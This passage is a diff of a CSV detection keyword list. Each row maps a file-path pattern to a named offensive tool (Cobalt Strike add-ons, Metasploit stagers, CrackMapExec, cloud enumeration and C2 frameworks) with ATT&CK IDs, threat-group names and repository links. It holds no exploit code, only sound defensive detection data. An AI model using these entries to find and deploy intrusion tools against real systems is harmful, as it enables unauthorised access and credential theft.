T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/clipboardinject/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/clipboardinject.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/clipboardinject/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*/clipmon/clipmon.sln*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/clipmon/dll/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","","N/A","","","" -"*/CloakNDaggerC2*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-02T19:54:24Z","2023-04-28T01:58:18Z" +"*/CloakNDaggerC2*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" "*/clock-skew.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/cloud_enum.git*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" -"*/cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" -"*/cloud_enum.txt*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" -"*/cloudbrute.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*/cloudsploit.git*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2921","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" +"*/cloud_enum.git*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*/cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*/cloud_enum.txt*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*/cloudbrute.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/cloudsploit.git*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z" "*/clown-newuser.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/cmd/c2.go*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*/cmd/hades/*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*/cmd_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*/cmd_log.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/cmd_stager*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/cmdstager/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/cme smb *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/cme winrm *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/cme_adcs_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/cme_shares_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/cme_spooler_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/cmd_log.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/cmd_stager*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/cmdstager/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/cme smb *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/cme winrm *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/cme_adcs_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/cme_shares_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/cme_spooler_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*/CMSeek*","offensive_tool_keyword","CMSeek","CMS Detection and Exploitation suite - Scan WordPress. Joomla. Drupal and 130 other CMSs.","T1553 - T1580 - T1583 - T1584 ","TA0007","N/A","N/A","Web Attacks","https://github.com/Tuhinshubhra/CMSeek","1","0","N/A","N/A","10","2062","497","2023-07-03T12:17:20Z","2018-06-14T00:15:51Z" "*/Cn33liz*","offensive_tool_keyword","Github Username","Github username Red teamer @ Outflank. Passionate about networking and cybersecurity. known for exploitation tools dev","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cna/pipetest.cna*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" @@ -3107,17 +3113,17 @@ "*/cobalt-strike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/cobaltstrike/c2lint*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" "*/CodeBuildLooter.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" -"*/coercer.egg-info*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation 